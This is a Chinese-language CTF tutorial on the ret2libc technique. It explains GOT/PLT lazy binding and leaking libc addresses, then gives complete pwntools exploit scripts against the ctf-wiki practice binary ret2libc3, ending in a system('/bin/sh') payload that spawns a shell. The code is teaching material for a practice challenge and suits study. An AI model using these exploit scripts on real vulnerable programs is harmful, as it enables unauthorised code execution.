嵌入式技術：ret2libc原理和應用講解

　　之前曾在Pwn入門之基礎棧溢出里面曾經提過ret2libc的相關知識，但是寫的比較籠統(tǒng)，感覺對新手還是不夠友好，想通過本文對ret2libc的原理和利用進行詳細講解。

　　前置知識

　　GOT表和PLT表

　　got表也叫全局偏移表（Global Offset Table）是Linux ELF文件中用于定位全局變量和函數的一個表。

　　plt表也叫過程鏈接表（Procedure Linkage Table）是Linux ELF文件中用于延遲綁定的表惡，即函數第一次被調用的時候才進行綁定。

　　在程序運行過程中，plt表和got表的運行過程大致如下：

　　用一句話來總結就是，可執(zhí)行文件里保存的是plt表的地址，對應plt地址指向的是got的地址，got表指向的是glibc中的地址

　　在這里如果需要通過plt表獲取函數的地址，需要保證got表已經獲取了正確的地址，但如果一開始對所有函數都進行了重定位是比較麻煩且浪費資源，為此，Linux引入了延遲綁定機制。

　　延遲綁定

　　這種機制存在的目的是glibc為了節(jié)約系統(tǒng)資源，提高性能。其詳細過程如下

　　源程序在第一次調用一個函數時，首先去

　　如果存在一個tide函數，這個函數在plt中的條目為tide@plt，在got中的條目為tide@got，那么在第一次調用bar函數時，首先會跳轉到plt，偽代碼如下：

　　tide@plt; jmp tide@got patch tide@got

　　這里會從PLT跳到GOT，如果函數從來沒有調用過，那這時GOT會跳轉回PLT并調用patch tide@got，這行代碼的作用是將bar函數真正的地址填充到tide@got，然后跳轉到bar函數真正的地址執(zhí)行代碼。當下次再次調用bar函數的時候，執(zhí)行路徑就是先跳轉到tide@plt、tide@got、tide真正的地址。

　　簡而言之就是，當一個函數被調用過后，got表里保存了他在內存中的地址，可以通過泄漏got表內存來泄漏函數地址，然后可以根據起泄漏的函數地址獲得其libc版本，從而計算其他函數在內存空間中的地址。因為libc中任意兩個函數之間的偏移是固定的。

　　以計算system函數在內存空間中的函數地址舉例。

　　1. 獲取__libc_start_main函數在內存空間中的地址addr_main

　　2. __libc_start_main函數相對于libc.so.6的起始地址是addr_main_offset

　　3. system函數相對于libc.so.6的起始地址是addr_system_offset

　　4. 則system函數在內存中真正的地址為addr_main+addr_system_offset-addr_main_offset

　　在我們ret2libc中我們只需要理解為，只有執(zhí)行過的函數，我們才能通過got表泄漏其地址。

　　基本思路

　　ret2libc是控制函數執(zhí)行l(wèi)ibc中的函數，通常是返回至某個函數的plt處。一般情況下，會選擇執(zhí)行system（‘/bin/sh’），因此需要找到system函數的地址看到這里相信有的師傅就會問了，為什么不能直接跳到got表，通過前面的前置知識我們知道plt表中的地址對應的是指令，got表中的地址對應的是指令地址，而返回地址必須保存一段有效的匯編指令，所以必須要用plt表 ret2libc通?？梢苑譃橄旅鎺追N類型：

　　? 程序中自身包含system函數和“/bin/sh”字符串

　　? 程序中自身就有system函數，但是沒有“/bin/sh”字符串

　　? 程序中自身沒有syetem函數和“/bin/sh”字符串，但給出了libc.so文件

　　? 程序中自身沒有sysetm函數和“/bin/sh”字符串，并且沒有給出libc.so文件

　　針對前面那三種在前面的文章中已經進行過詳細講解，本文主要是針對第四種情況進行講解對于沒有給出libc.so文件的程序，我們可以通過泄漏出程序當中的某個函數的地址，通過查詢來找出其中使用lib.so版本是哪一個，然后根據lib.so的版本去找到我們需要的system函數的地址。針對常見的題目我們的解題思路是這樣的：

　　1. 利用棧溢出及puts函數泄漏出在got表中__libc_start_main函數的地址

　　2. puts函數的返回地址為_start函數

　　3. 利用最低的12位找出libc版本（即使程序有ASLR保護，也只是針對地址中間位進行隨機，最低的12位并不會發(fā)生改變）

　　4. 利用找到的libc版本計算system函數和/bin/sh字符串在內存中的正確的地址

　　實戰(zhàn)

　　我們還是利用ctfwiki中的ret2libc3進行講解分析程序

　　根據前面分析的，我們需要找到如下幾個地址

　　? __libc_start_main函數在got表的地址

　　? _start函數的地址

　　? puts函數在plt表中的地址

　　__libc_start_main函數在got表中的地址

　　_start函數的地址

　　puts函數在plt表中的地址

　　獲取到這三個地址后，我們可以采用調用puts函數后，ret到main函數，用main函數里面的gets來獲取libc_start的地址

　　獲取libc_start地址的腳本如下

　　from pwn import * sh = process（‘。/ret2libc3’） puts_plt = 0x8048460 addr_start = 0x80484d0 got_libc_start = 0x804a024 payload = 112 * b‘a’ + p32（puts_plt） + p32（addr_start） + p32（got_libc_start） sh.recv（） sh.sendline（payload） puts_addr = u32（sh.recv（4）） success（“__libc_start_addr is：” + hex（puts_addr）） sh.recv（）

　　即使程序有ASLR保護，也只是針對地址中間位進行隨機，最低的12位并不會發(fā)生改變，在16進制中也就是我們的最后3位，因此cd0是不會變，使用libc database search（https://libc.blukat.me/）進行查詢（網上普遍推薦的是利用LibcSearcher，但是我用LibcSearcher一直沒打通）

　　看到這么多l(xiāng)ibc版本挨個試可能會累死，于是再來泄漏個puts的地址

　　還剩下三個了，使用下面的腳本挨個嘗試吧

　　from pwn import * sh = process（‘。/ret2libc3’） puts_plt = 0x8048460 addr_start = 0x80484d0 got_libc_start = 0x804a024 got_puts = 0x804a018 # 獲取__libc_start的地址 payload1 = 112 * b‘a’ + p32（puts_plt） + p32（addr_start） + p32（got_libc_start） sh.recv（） sh.sendline（payload1） libc_start_addr = u32（sh.recv（4）） success（“__libc_start_addr is：” + hex（libc_start_addr）） # 獲取puts的地址 payload2 = 112 * b‘a’ + p32（puts_plt） + p32（addr_start） + p32（got_puts） sh.recv（） sh.sendline（payload2） puts_addr = u32（sh.recv（4）） success（“puts_addr is：” + hex（puts_addr）） sh.recv（） libc_start = #通過libc database search獲取 libc_system = #通過libc database search獲取 libc_binsh = #通過libc database search獲取 libcbase = libc_start_addr - libc_start system_addr = libcbase + libc_system binsh_addr = libcbase + libc_binsh payload = 112 * b‘a’ + p32（system_addr） + 4 * b‘a’ + p32（binsh_addr） sh.sendline（payload） sh.interactive（）

　　最終經過多次實驗可知，libc文件是libc6_2.31-0ubuntu9_i386 最終的完整腳本如下

　　from pwn import * sh = process（‘。/ret2libc3’） puts_plt = 0x8048460 addr_start = 0x80484d0 got_libc_start = 0x804a024 got_puts = 0x804a018 # 獲取__libc_start的地址 payload1 = 112 * b‘a’ + p32（puts_plt） + p32（addr_start） + p32（got_libc_start） sh.recv（） sh.sendline（payload1） libc_start_addr = u32（sh.recv（4）） success（“__libc_start_addr is：” + hex（libc_start_addr）） # 獲取puts的地址 payload2 = 112 * b‘a’ + p32（puts_plt） + p32（addr_start） + p32（got_puts） sh.recv（） sh.sendline（payload2） puts_addr = u32（sh.recv（4）） success（“puts_addr is：” + hex（puts_addr）） sh.recv（） libc_start = 0x01edf0 libc_system = 0x045830 libc_binsh = 0x192352 libcbase = libc_start_addr - libc_start system_addr = libcbase + libc_system binsh_addr = libcbase + libc_binsh payload = 112 * b‘a’ + p32（system_addr） + 4 * b‘a’ + p32（binsh_addr） sh.sendline（payload） sh.interactive（）成功打通

　　總結

　　ret2libc這種題型，相較于前面簡單的題目，對Linux中程序運行的理解要求更高，一開始根據網上的教程去尋找libc版本的時候發(fā)現大多數教程都是使用腳本去獲取，但在自己嘗試的時候就一直打不通，于是便放棄了腳本采用手工的方式進行查找，可能相較于通過腳本直接獲取更加費時費力，但是也通過這個倒逼自己將got表和plt表的相關知識徹底理解透徹，也捋清楚了程序在Linux中到底是如何運行的。

　　編輯：黃飛

閱讀全文

Linux(206514) Linux(206514)
內存(72585) 內存(72585)

1335

已全部加載完成

搜索歷史

嵌入式技術：ret2libc原理和應用講解

評論